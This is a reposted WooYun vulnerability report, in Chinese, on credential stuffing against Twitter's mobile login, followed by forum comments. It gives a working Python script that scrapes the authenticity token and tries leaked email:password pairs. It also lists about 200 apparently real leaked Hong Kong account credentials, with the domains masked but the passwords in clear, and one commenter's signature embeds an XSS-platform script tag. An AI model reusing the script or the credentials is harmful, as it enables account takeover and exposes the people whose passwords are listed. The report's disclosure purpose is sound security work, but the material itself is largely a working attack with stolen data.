Twitter推特登陆接口可撞库

admin
admin
admin
139646
文章
114
评论
2017年4月8日05:45:23评论689 views字数 234阅读0分46秒阅读模式
摘要

2016-03-29: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-11: 细节向核心白帽子及相关领域专家公开
2016-04-21: 细节向普通白帽子公开
2016-05-01: 细节向实习白帽子公开
2016-05-16: 细节向公众公开

漏洞概要 关注数(129) 关注此漏洞

缺陷编号: WooYun-2016-190360

漏洞标题: Twitter推特登陆接口可撞库

相关厂商: Twitter

漏洞作者: 猪猪侠Twitter推特登陆接口可撞库

提交时间: 2016-03-29 15:30

公开时间: 2016-05-16 17:30

漏洞类型: 账户体系控制不严

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 认证设计不合理

14人收藏

漏洞详情

披露状态:

2016-03-29: 细节已通知厂商并且等待厂商处理中
2016-04-01: 厂商已经确认,细节仅向厂商公开
2016-04-11: 细节向核心白帽子及相关领域专家公开
2016-04-21: 细节向普通白帽子公开
2016-05-01: 细节向实习白帽子公开
2016-05-16: 细节向公众公开

简要描述:

Uber优步撞库攻击,富有中国特色的业务缺陷
/bugs/wooyun-2010-0188046

该报告描述了twitter在处理用户登录过程中,未考虑属于同一个地区的单个请求IP ( 貌似把海外地区的全部城市都划分为一个国家地区了,比如香港),重复尝试登录多个不同用户的撞库场景(如果地区和历史不同,登录成功后 ,会提示一个可疑活动侵害提示)。

一个邮箱账号,可尝试使用5个已知密码,不然IP会被标示风险,如果使用不同的邮箱账号,IP就能持续使用尝试撞库。

详细说明:

登录接口

https://**.**.**.**/login

服务器根据用户User-Agent中的浏览器版本和语言,自适应的推送相对应的后台接口

当UA设置为Nokie N9,IP所在地香港,服务端对应的接口内容如下

code 区域 
user-agent : Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13
 
 accept-language : zh-CN,zh;q=0.8,en;q=0.6

Twitter推特登陆接口可撞库

### 登录验证页面源码

```

code 区域 
<div id="main_content">
 <div class="signup-body">
 
 <form action="/sessions" method="post" class="signin-form">
 <span class="m2-auth-token">
 <input name="authenticity_token" type="hidden" value="6a56481e83a480a80eaa5fbddd7abb48"/>
 </span>
 <input type="hidden" name="remember_me" value="1"/>
 <input type="hidden" name="wfa" value="1"/>
 <input type="hidden" name="redirect_after_login" value="/home?login=1459222974246" />
 <fieldset class="inputs">
 <div class="signup-container">
 <div class="signup-field">
 <input autocapitalize="off" autocorrect="off" class="signup-input"
   id="session[username_or_email]" name="session[username_or_email]"
   placeholder="電話、電子郵件或使用者名稱" type="text" value="">
 </div>
 </div>
 <div class="signup-container">
 <div class="signup-field">
 <input class="signup-input" id="session
		

			
输入密码查看隐藏内容

			

				
				
			

		
" name="session
		

			
输入密码查看隐藏内容

			

				
				
			

		
"
   placeholder="密碼" type="password" value="">
 </div>
 </div>
 </fieldset>
 
 <div class="signup-button">
 <button class="signup button" id="signupbutton" type="submit">登入</button>
 </div>
 </form>
 </div>

### 登录流程

1. 访问最精简的移动端登录页面

https://**.**.**.**/login

2. 获取登录页面内隐藏的authenticity_token

3. 拼接登录表单(FORM),尝试撞库

4. 根据返回结果页面,判断是否登录成功

5. 如果服务器的返回结果为Status Code : 302

https://**.**.**.**/login/error?username_or_email=email@**.**.**.**

6. 判断是否包含如下内容 : 你輸入的電子郵件和密碼與我們的記錄不符

Twitter推特登陆接口可撞库

漏洞证明:

code 区域 
Starting check ring05h@**.**.**.** : 123456
 Starting check ring07h@**.**.**.** : 123456
 Starting check ring08h@**.**.**.** : 123456
 Starting check ring04h@**.**.**.** : truepassword
 ring04h@**.**.**.** truepassword login success.
 call destroy()
 Starting check ring09h@**.**.**.** : 123456
 Starting check ring10h@**.**.**.** : 123456
 Starting check ring11h@**.**.**.** : 123456
 Starting check ring12h@**.**.**.** : 123456
 Starting check ring13h@**.**.**.** : 123456
 Starting check ring14h@**.**.**.** : 123456
 Starting check ring15h@**.**.**.** : 123456
 Starting check ring16h@**.**.**.** : 123456
 Starting check ring17h@**.**.**.** : 123456
 Starting check ring18h@**.**.**.** : 123456
 [Finished in 58.2s]

POC : http://**.**.**.**/src/twitter.py

code 区域 
#!/usr/bin/env python
 # encoding: utf-8
 # email: ringzero@**.**.**.**
 
 import json
 import re
 import requests
 import time
 
 import requests.packages.urllib3
 requests.packages.urllib3.disable_warnings()
 
 requests = requests.Session()
 
 headers = {
     'User-Agent': 'Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13',
     'accept-language': 'zh-CN,zh;q=0.8,en;q=0.6',
     'origin': 'https://**.**.**.**',
     'pragma': 'no-cache',
     'referer': 'https://**.**.**.**/login',
     'upgrade-insecure-requests': '1',
 }
 
 class Twitter_Login(object):
     """docstring for Twitter_Login"""
     def __init__(self):
         super(Twitter_Login, self).__init__()
         self.website = 'https://**.**.**.**'
         
     def parser_token(self, content):
         auth_token = re.search('authenticity_token" type="hidden" value="(.*?)"/>', content)
         return auth_token.group(1) if auth_token else None
 
     def init_token(self):
         url = '{0}/login'.format(self.website)
         content = requests.get(url, headers=headers, allow_redirects=True).content
         return content
 
     def parser_success(self, email, content):
         if email in content or '记录不匹配' in content:
             return False
         else:
             return True
 
     def session(self, token, email, password):
         payload = {
             'authenticity_token' : token,
             'session[username_or_email]' : email,
             'session
		

			
输入密码查看隐藏内容

			

				
				
			

		
': password,
             'remember_me' : 1, 
             'wfa' : 1,
             'commit' :'登入',
         }
 
         url = '{0}/sessions'.format(self.website)
         result = requests.post(url,
             headers=headers,
             data=payload,
             allow_redirects=True)
         return result
 
     def run(self):
         session_content = self.init_token()
         userdict = [
             'ring05h@**.**.**.**:123456',
             'ring07h@**.**.**.**:123456',
             'ring08h@**.**.**.**:123456',
             'ring04h@**.**.**.**:truepassword',
             'ring09h@**.**.**.**:123456',
             'ring10h@**.**.**.**:123456',
             'ring11h@**.**.**.**:123456',
             'ring12h@**.**.**.**:123456',
             'ring13h@**.**.**.**:123456',
             'ring14h@**.**.**.**:123456',
             'ring15h@**.**.**.**:123456',
             'ring16h@**.**.**.**:123456',
             'ring17h@**.**.**.**:123456',
             'ring18h@**.**.**.**:123456',]
 
         for combo in userdict:
             token = self.parser_token(session_content)
             if token is not None:
                 email, password = combo.split(':')
                 print 'Starting check {0} : {1}'.format(email, password)
                 session_content = self.session(token, email, password).content
                 if self.parser_success(email, session_content):
                     print email, password, 'login success.'
                     self.destroy()
                     time.sleep(2)
                     session_content = self.init_token()
                 time.sleep(3)
 
     def destroy(self):
         print 'call destroy()'
         url = '{0}/account'.format(self.website)
         content = requests.get(url, headers=headers, allow_redirects=True).content
         token = self.parser_token(content)
 
         if token is not None:
             # destroy logout
             url = '{0}/session/destroy'.format(self.website)
             payload = {
                 'authenticity_token': token,
                 'commit': '登出'
             }
             result = requests.post(url,
                 headers=headers,
                 data=payload,
                 allow_redirects=True)
         
 twitter = Twitter_Login()
 twitter.run()

通过数据库匹配香港地区泄露的邮箱+密码,尝试登陆,成功了上万个账号,列出200个证明

code 区域 
notthing101@**.**.**.**:93013676://**.**.**.**/:1:16:2
 staring_789@**.**.**.**:963258://**.**.**.**/:7:0:1
 ho165948@**.**.**.**:165948://**.**.**.**/:0:1:0
 jasonsheung@**.**.**.**:jason488://**.**.**.**/:0:0:1
 :19901111://**.**.**.**/:5:22:5
 lovecelest@**.**.**.**:331080://**.**.**.**/:0:22:1
 :19940223://**.**.**.**/:0:0:0
 marcotsm@**.**.**.**:572198://**.**.**.**/:0:0:1
 siu_sa_al_mi@**.**.**.**:82468246://**.**.**.**/:0:0:0
 qkling@**.**.**.**:111ling://**.**.**.**/:1:3:1
 maggie_yklorn@**.**.**.**:630123://**.**.**.**/:4:20:0
 yman9876@**.**.**.**:27786999://**.**.**.**/:5:1:0
 ivan0984@**.**.**.**:16101610://**.**.**.**/:0:8:4
 karen3e40@**.**.**.**:011169://**.**.**.**/:8:18:1
 thkwok818@**.**.**.**:434200://**.**.**.**/:1:0:5
 ahhoi2007@**.**.**.**:19770906://**.**.**.**/:1:15:3
 pwan1310@**.**.**.**:336699pw://**.**.**.**/:0:3:0
 jameslee@**.**.**.**:selfcontrol://**.**.**.**/:5:1:0
 cloud_2525@**.**.**.**:1484468://**.**.**.**/:0:9:0
 hollyinx_gazerock@**.**.**.**:yusuke://**.**.**.**/:4:121:19
 hw317hhh@**.**.**.**:27170271://**.**.**.**/:6:0:0
 apple_vic@**.**.**.**:yanple91://**.**.**.**/:17:25:9
 choas666@**.**.**.**:1234567890://**.**.**.**/:2:0:0
 b1233211234567@**.**.**.**:08020802://**.**.**.**/:0:1:0
 hoitung112@**.**.**.**:911102://**.**.**.**/:2:11:3
 pm1055_siudin@**.**.**.**:24266477://**.**.**.**/:0:0:1
 yanyanwinter@**.**.**.**:120012://**.**.**.**/:14:11:8
 :27787269://**.**.**.**/:8:66:0
 singson1986@**.**.**.**:719419://**.**.**.**/:0:1:0
 cheukngai918@**.**.**.**:pls32013://**.**.**.**/:35:0:0
 krosslam@**.**.**.**:woodstock://**.**.**.**/:0:1:1
 yssum614@**.**.**.**:300312://**.**.**.**/:13:8:1
 johnon7@**.**.**.**:Z960624://**.**.**.**/:19:43:6
 cyy-3-@**.**.**.**:246810://**.**.**.**/:1:3:0
 chi731@**.**.**.**:3782428://**.**.**.**/:0:0:0
 :03150315://**.**.**.**/:10:2:1
 leifuson@**.**.**.**:999999://**.**.**.**/:0:0:0
 coffee2653@**.**.**.**:26538767://**.**.**.**/:65:1:1
 :229831://**.**.**.**/:0:4:5
 filetofish85@**.**.**.**:303160://**.**.**.**/:299:0:0
 772593150@**.**.**.**:h53545354://**.**.**.**/:0:0:0
 williamhui1998@**.**.**.**:ilcclm://**.**.**.**/:1:18:3
 investwhat@**.**.**.**:898110://**.**.**.**/:2:3:0
 muingotung_kaitung@**.**.**.**:65046244://**.**.**.**/:0:34:1
 tou1234567@**.**.**.**:132567890://**.**.**.**/:4:15:7
 yoursphoebe@**.**.**.**:7926058://**.**.**.**/:0:7:1
 wuyukfaat1993@**.**.**.**:y3184623://**.**.**.**/:0:2:1
 darli91912@**.**.**.**:19921109://**.**.**.**/:0:17:4
 spa_turbo@**.**.**.**:iloveu://**.**.**.**/:3:2:1
 gt83b64@**.**.**.**.tw:gilu6738://**.**.**.**/:Tweets:Following:Followers
 smartdr.ken@**.**.**.**:21234086://**.**.**.**/:7:3:0
 shadowkisze@**.**.**.**:170858://**.**.**.**/:17:48:15
 viviankaki@**.**.**.**:130394://**.**.**.**/:0:15:0
 climbc50579@**.**.**.**:19950925://**.**.**.**/:42:59:17
 csc1128@**.**.**.**:raymond1://**.**.**.**/:1:5:4
 mayuen@**.**.**.**:950610://**.**.**.**/:5:21:1
 andyweang@**.**.**.**.tw:123377134://**.**.**.**/:0:0:0
 sumlok@**.**.**.**:26630004://**.**.**.**/:0:0:2
 ruby_hui999@**.**.**.**:168888://**.**.**.**/:0:2:1
 chun_9314@**.**.**.**:26723685://**.**.**.**/:24:2:1
 laisamuelki@**.**.**.**:8211123://**.**.**.**/:60:34:10
 falcocreate@**.**.**.**:417417://**.**.**.**/:1:0:0
 nineboys2002@**.**.**.**:935350://**.**.**.**/:3:1:0
 hang_drumz@**.**.**.**:ilovegod://**.**.**.**/:39:0:0
 bbeennsshhii@**.**.**.**:candychan://**.**.**.**/:1:4:3
 ting_0830@**.**.**.**:35257387://**.**.**.**/:117:26:0
 llw.gary@**.**.**.**:z1774329://**.**.**.**/:Tweets:Following:Followers
 kimmy_0208@**.**.**.**:26640684://**.**.**.**/:0:0:0
 justtosayhi@**.**.**.**:yimlay://**.**.**.**/:Tweets:Following:Followers
 lausuihang@**.**.**.**:asdfghjkl://**.**.**.**/:0:3:0
 carol_kwan116@**.**.**.**:1161988://**.**.**.**/:0:0:0
 samuelfung50@**.**.**.**:007973://**.**.**.**/:2:2:5
 kenneth6562@**.**.**.**:282958://**.**.**.**/:2:0:0
 yinchunghui@**.**.**.**:19860526://**.**.**.**/:1:6:3
 seventh_fleet1943@**.**.**.**:iodine://**.**.**.**/:1:1:0
 rachelpig2005@**.**.**.**:pigpig://**.**.**.**/:4:2:0
 yeungws2@**.**.**.**:jennifer1://**.**.**.**/:0:0:0
 crazyrecall@**.**.**.**.tw:8632404://**.**.**.**/:61:324:2
 sumsum678@**.**.**.**:678678://**.**.**.**/:0:1:0
 FLorence_1120@**.**.**.**:3516197://**.**.**.**/:22:6:3
 ccc24hk@**.**.**.**:15771577://**.**.**.**/:0:19:3
 billy_paklam@**.**.**.**:beckham7://**.**.**.**/:2:0:1
 applekiki628@**.**.**.**:buddhist://**.**.**.**/:1:1:0
 tiger19951219@**.**.**.**:lollipop520://**.**.**.**/:3:24:6
 imaryo@**.**.**.**:316500://**.**.**.**/:4:10:1
 mandy2102@**.**.**.**:manman21://**.**.**.**/:19:14:4
 yychau0212@**.**.**.**:601643://**.**.**.**/:0:20:2
 sheging@**.**.**.**:c00632://**.**.**.**/:0:0:3
 jackkwokho@**.**.**.**:11683611://**.**.**.**/:419:71:19
 wlcgz0582@**.**.**.**:67600350://**.**.**.**/:5:69:7
 amiwawa9032003@**.**.**.**:beyonce://**.**.**.**/:0:20:4
 loconnie@**.**.**.**:777999://**.**.**.**/:32:1:0
 nicoyau1104@**.**.**.**:19911104://**.**.**.**/:6:1:0
 yau1101@**.**.**.**:771101://**.**.**.**/:3546:2:0
 victrix10nike@**.**.**.**:870715://**.**.**.**/:337:6:2
 gracetwk@**.**.**.**:8299885://**.**.**.**/:0:0:4
 :367409://**.**.**.**/:1:1:0
 gemmalau2@**.**.**.**:1996515://**.**.**.**/:11:32:2
 jeffreyau1995@**.**.**.**:bb123456://**.**.**.**/:25:7:3
 terter715@**.**.**.**:lovingu://**.**.**.**/:3:6:13
 diamonmichelle@**.**.**.**:19940914://**.**.**.**/:17:162:24
 hoganle1314@**.**.**.**:00000333://**.**.**.**/:1:1:2
 ching-125@**.**.**.**:lillian://**.**.**.**/:0:8:4
 tingtingac@**.**.**.**:titiac://**.**.**.**/:1:0:0
 rachels0810@**.**.**.**:810211://**.**.**.**/:0:0:0
 winwyi_tang@**.**.**.**:230456://**.**.**.**/:28:24:10
 middle817@**.**.**.**:23881271://**.**.**.**/:0:42:2
 erichin1992@**.**.**.**:q132456://**.**.**.**/:53:3:0
 kei.322@**.**.**.**:03220617://**.**.**.**/:39:7:4
 zerovack@**.**.**.**:7x4s9tev://**.**.**.**/:1:2:1
 ray1234_2000@**.**.**.**:198212://**.**.**.**/:0:0:0
 ellischan22001@**.**.**.**:26760311://**.**.**.**/:1:0:0
 akindosky@**.**.**.**:7291314://**.**.**.**/:0:0:0
 chanj910@**.**.**.**:091083://**.**.**.**/:0:0:0
 lxc5089@**.**.**.**:21820099://**.**.**.**/:7:0:1
 kyo2047@**.**.**.**:a84371c1://**.**.**.**/:266:17:2
 smmen3@**.**.**.**:487968://**.**.**.**/:0:6:0
 kuuipokao@**.**.**.**:129129://**.**.**.**/:1:22:0
 b278755006@**.**.**.**:2006712522://**.**.**.**/:6:12:0
 yancheung2141@**.**.**.**:2141785://**.**.**.**/:0:1:0
 badboy_baby1314@**.**.**.**:babyyan1314://**.**.**.**/:0:0:0
 konicacheung@**.**.**.**:casillas://**.**.**.**/session/new:2:20:6
 jlwhvh@**.**.**.**:vicky00://**.**.**.**/:0:0:0
 chisanmok@**.**.**.**:mok123://**.**.**.**/:164:2:0
 mini_et_kiwi@**.**.**.**:ling00://**.**.**.**/:10:20:1
 nicoleytyan@**.**.**.**:19921118a://**.**.**.**/:4:5:0
 goalcaught@**.**.**.**:19790417://**.**.**.**/:0:0:0
 alex_leung2412@**.**.**.**:122491://**.**.**.**/:33:13:0
 wfw7459@**.**.**.**:2988556://**.**.**.**/:0:20:1
 aplong.long@**.**.**.**:550718://**.**.**.**/:2:1:0
 cokes1994128@**.**.**.**:245125://**.**.**.**/:5:1:0
 vsmos@**.**.**.**:v720v720://**.**.**.**/:85:17:0
 kit90920@**.**.**.**:19900920://**.**.**.**/:59:3:0
 christychan0807@**.**.**.**:124818://**.**.**.**/:3:2:4
 ryan_tsui_wy@**.**.**.**:112693://**.**.**.**/:0:2:9
 raymondkwok9595@**.**.**.**:19819595://**.**.**.**/:0:1:1
 barryhung2000@**.**.**.**:120371://**.**.**.**/:35:7:5
 marlui22@**.**.**.**:2625088://**.**.**.**/:118:62:7
 ellepig114@**.**.**.**:iloveyou4ever://**.**.**.**/:183:28:15
 hcbf22142@**.**.**.**:19833891://**.**.**.**/:0:19:0
 leewai01@**.**.**.**:54995499://**.**.**.**/:0:4:1
 yiufai1988@**.**.**.**:19051905://**.**.**.**/:1:0:0
 kelvintofai@**.**.**.**:11221215://**.**.**.**/:0:2:0
 yuen_tsang5f@**.**.**.**:081586://**.**.**.**/:0:9:0
 tw.test@**.**.**.**:mfokrythu://**.**.**.**/:0:3:0
 kaphwan0@**.**.**.**:12241224://**.**.**.**/:1:0:0
 ringo06161@**.**.**.**:ringo1994://**.**.**.**/:20:7:0
 tszching929@**.**.**.**:583370://**.**.**.**/:36:45:5
 kcwcyber@**.**.**.**:888999://**.**.**.**/:0:4:2
 msble@**.**.**.**:717946://**.**.**.**/:0:1:1
 wong_03032000@**.**.**.**:135790://**.**.**.**/:22:1:0
 julian01017@**.**.**.**:polaroid://**.**.**.**/:16:22:7
 gk6899@**.**.**.**:090984://**.**.**.**/:0:17:3
 ma0319368202@**.**.**.**:ma0319://**.**.**.**/:0:0:7
 hiuting724@**.**.**.**:24785455://**.**.**.**/:120:107:10
 chenyichenn@**.**.**.**:123456://**.**.**.**/:2:3:0
 keik1107@**.**.**.**:046106://**.**.**.**/:4:0:0
 yeung_wai58462@**.**.**.**:108695://**.**.**.**/:36:6:0
 dovejj_512@**.**.**.**:59876078://**.**.**.**/:0:1:0
 to1118@**.**.**.**:webpass://**.**.**.**/:1:6:0
 ideepvluk@**.**.**.**:768439://**.**.**.**/:0:0:0
 chungtt19852002@**.**.**.**:19851016://**.**.**.**/:435:1628:13
 wai1021@**.**.**.**:hammett1021://**.**.**.**/:5:79:12
 jasmine0207@**.**.**.**:12270207://**.**.**.**/:92:24:23
 wfh0805@**.**.**.**:111111://**.**.**.**/:15:0:1
 jerryashley1982@**.**.**.**:041182://**.**.**.**/:2:1:7
 davis.tcl@**.**.**.**:14021981://**.**.**.**/:1:13:1
 tsoi_lee@**.**.**.**:fuckoff1://**.**.**.**/:0:0:1
 jameschangwk@**.**.**.**.cn:fuckyou000://**.**.**.**/:0:1:0
 yyy221@**.**.**.**:123yyy://**.**.**.**/:0:20:2
 blackdog91428@**.**.**.**:7833643://**.**.**.**/:456:1362:10
 hwpoonjackie2007@**.**.**.**:007008009://**.**.**.**/:13:0:0
 sharycat0428@**.**.**.**:510428://**.**.**.**/:0:35:1
 ohoj@**.**.**.**:102058://**.**.**.**/:0:0:0
 amyyyyy402@**.**.**.**:chemistry://**.**.**.**/:18:2:2
 m5864980@**.**.**.**.tw:a200486120://**.**.**.**/:1:387:1
 siuwaikitricky@**.**.**.**:6305645://**.**.**.**/:0:1:0
 hahaha3333@**.**.**.**:choitszngong://**.**.**.**/:110:9:0
 sing_926@**.**.**.**:singsing://**.**.**.**/:10:1:0
 hkgavin999@**.**.**.**:92445823://**.**.**.**/:4:0:0
 hallelujahbaby@**.**.**.**:199072://**.**.**.**/:0:4:0
 wilsom2009@**.**.**.**:01071990://**.**.**.**/:0:1:1
 :22648792://**.**.**.**/:61:17:3
 luck_box2006@**.**.**.**:874605://**.**.**.**/:0:0:0
 afdkwok@**.**.**.**:AKwok11://**.**.**.**/:12:15:4
 lowbsonson@**.**.**.**:92576291://**.**.**.**/:6:3:1
 frankietang1991@**.**.**.**:fghtyabn://**.**.**.**/:3:29:3
 assbsb258258@**.**.**.**:20020000://**.**.**.**/:1:1:0
 hingyuen1188@**.**.**.**:4148412://**.**.**.**/:1:10:0
 cst1124@**.**.**.**:p0515977://**.**.**.**/:11:2:0
 kanix829@**.**.**.**:19880829://**.**.**.**/:0:21:0
 panpeter@**.**.**.**:332089://**.**.**.**/:0:1:0
 h810809@**.**.**.**:et2212://**.**.**.**/:0:3:0
 elvis_1017@**.**.**.**:19901219://**.**.**.**/:0:0:0
 1313tk@**.**.**.**:a66886688://**.**.**.**/:0:2:3
 billy999111@**.**.**.**:24515156://**.**.**.**/:15:8:7
 coco926hk@**.**.**.**:0115061://**.**.**.**/:1:22:3
 James01102@**.**.**.**:wing1c20://**.**.**.**/:2:13:1
 wayne618825@**.**.**.**:618825://**.**.**.**/:1:8:3
 nicole.liew@**.**.**.**:145264://**.**.**.**/:1:0:0
 gladyschow95@**.**.**.**:Y4677364://**.**.**.**/:0:1:2
 lamz0725@**.**.**.**:sinnung://**.**.**.**/:1:0:6

修复方案:

# 加入图片验证码,而不是使用简单的csrf_token

# 复杂的业务场景设计权衡

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-04-01 17:29

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-03-29 15:30 | 奶嘴 ( 普通白帽子 | Rank:414 漏洞数:110 | 17岁的毛孩 有些厂商故意加你好友,和你聊...)

    1

    前排

  2. 2016-03-29 15:34 | 凌晨G度 ( 路人 | Rank:7 漏洞数:2 | 充实的麦穗都是低着头,倒是那些空壳却昂着...)

    1

    板凳

  3. 2016-03-29 15:37 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    1

    地板。。。

  4. 2016-03-29 15:44 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

    1

    卧槽

  5. 2016-03-29 15:44 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    1

  6. 2016-03-29 15:45 | 疯狗 Twitter推特登陆接口可撞库 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    1

    中国特色安全隐患

  7. 2016-03-29 15:54 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    1

    NB!

  8. 2016-03-29 15:59 | 娃哈哈 ( 实习白帽子 | Rank:58 漏洞数:12 | 伟大的科学家)

    1

    描述了tiwtter在处理.. tiwtter什么鬼

  9. 2016-03-29 15:59 | 木易 ( 普通白帽子 | Rank:347 漏洞数:70 | 不,,不要误会,我不是针对谁,我是说在座...)

    1

    大家静静

  10. 2016-03-29 16:03 | chock ( 普通白帽子 | Rank:156 漏洞数:33 | 若你喜欢怪人)

    1

    咦?Twitter?有这个站吗?

  11. 2016-03-29 16:04 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    1

    twitter说么关系

  12. 2016-03-29 16:05 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    1

    哈哈哈哈。

  13. 2016-03-29 16:09 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

    1

    国际化

  14. 2016-03-29 16:11 | lijiejie Twitter推特登陆接口可撞库 ( 核心白帽子 | Rank:2527 漏洞数:325 | Just for fun.)

    1

    看标题就好厉害啊

  15. 2016-03-29 16:30 | bit4 ( 路人 | Rank:18 漏洞数:3 | 终于,我也是有ID的人了!)

    1

    围观猪哥

  16. 2016-03-29 16:33 | 习总夸我好青年 ( 路人 | Rank:2 漏洞数:1 | 刚来的,请多关照)

    1

    与国际接轨

  17. 2016-03-29 17:41 | Ziiber ( 路人 | Rank:12 漏洞数:3 | 随风奔跑自由是方向、追逐雷和闪电的力量)

    1

    楼下有什么话说

  18. 2016-03-29 17:42 | ’‘Nome ( 普通白帽子 | Rank:144 漏洞数:31 | 有事请发邮件,,垃圾邮...)

    1

    @lijiejie 李哥求微软的注入的相关文章

  19. 2016-03-29 18:27 | ArcticWolf ( 普通白帽子 | Rank:112 漏洞数:34 | 呃···是AW!不是AV!)

    1

    猪哥一出,谁与争锋

  20. 2016-03-29 18:52 | 欧尼酱 ( 路人 | Rank:15 漏洞数:7 | 技术马马虎虎)

    1

    围观大神

  21. 2016-03-29 19:25 | B1gstar ( 实习白帽子 | Rank:90 漏洞数:24 | 向各位学习来了。)

    1

    大把的美元你不要,难道是被拒绝了。----

  22. 2016-03-29 19:41 | Catsay ( 实习白帽子 | Rank:92 漏洞数:21 | 屌丝一枚)

    1

    前排

  23. 2016-03-29 19:42 | secart ( 实习白帽子 | Rank:50 漏洞数:9 | 这个人很懒,什么都没留。)

    1

    啊,猪猪侠跑出来了,强势围观。。

  24. 2016-03-29 20:39 | jye33 ( 普通白帽子 | Rank:1340 漏洞数:310 | 没有什么能够阻挡,我对静静的向往)

    1

    与国际接轨哦

  25. 2016-03-29 20:50 | autO_pw ( 实习白帽子 | Rank:81 漏洞数:25 | o_O``)

    1

    @迅雷 你亲戚出事了

  26. 2016-03-29 20:55 | 马崧耀 ( 实习白帽子 | Rank:59 漏洞数:13 )

    1

    围观0.0

  27. 2016-03-29 21:07 | Code Life ( 普通白帽子 | Rank:202 漏洞数:45 | Code Life,Join It!)

    1

    GWF

  28. 2016-03-29 21:13 | 集与成 ( 路人 | Rank:6 漏洞数:2 | 大隐隐于市)

    1

    中国制造走出国门

  29. 2016-03-29 21:31 | 心云 ( 普通白帽子 | Rank:534 漏洞数:146 | 有追求,才会有提高!尽快达到下一个目标!)

    1

    后排围观

  30. 2016-03-29 22:07 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

    1

    要翻墙

  31. 2016-03-29 22:51 | hecate ( 普通白帽子 | Rank:823 漏洞数:129 | ®高级安全工程师 | WooYun认证√)

    3

    今天是什么日子啊,国足居然出线了

  32. 2016-03-29 22:52 | 碎片 ( 路人 | Rank:26 漏洞数:11 | <script src=http://www.xss8.net/?c=MjMf4...)

    1

    好腻害,6666666

  33. 2016-03-30 08:07 | ω电池ω ( 路人 | Rank:4 漏洞数:2 | neusoft)

    1

    围观

  34. 2016-03-30 13:35 | 87技术联盟-Jack ( 路人 | Rank:12 漏洞数:6 | 来自于浩瀚网络中的小白!)

    1

    围观

  35. 2016-04-01 14:10 | 毛利小五郎 ( 路人 | Rank:4 漏洞数:3 | <>)

    3

    我们要坚决打击这种网络偷渡的行为,维护我国网络主权,人人有责! (每条0.5元,发帖时删除括号内容)

  36. 2016-05-03 14:56 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)

    0

    猪哥脚本666

  37. 2016-05-04 10:08 | 习总夸我好青年 ( 路人 | Rank:2 漏洞数:1 | 刚来的,请多关照)

    0

    我们要坚决打击这种网络偷渡的行为,维护我国网络主权,人人有责! (每条0.5元,发帖时删除括号内容)

  38. 2016-05-04 11:11 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

    0

    貌似不是5次密码吧,貌似是15次。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin